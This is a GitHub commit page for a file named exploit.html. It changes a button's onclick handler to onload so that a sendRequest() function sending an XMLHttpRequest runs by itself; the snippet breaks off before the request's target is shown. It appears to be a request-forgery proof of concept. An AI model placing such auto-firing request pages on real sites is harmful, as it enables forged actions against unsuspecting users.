Skip to content

Commit

Permalink
Update exploit.html
Browse files Browse the repository at this point in the history
  • Loading branch information
0xLittleSpidy authored Feb 19, 2024
1 parent 1a89189 commit c90b2c0
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion exploit.html
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
<!DOCTYPE html>
<html>
<body>
<button onclick='sendRequest()'>Submit request</button>
<button onload='sendRequest()'>Submit request</button>
<script>
function sendRequest() {
var xhr = new XMLHttpRequest();
Expand Down

0 comments on commit c90b2c0

Please sign in to comment.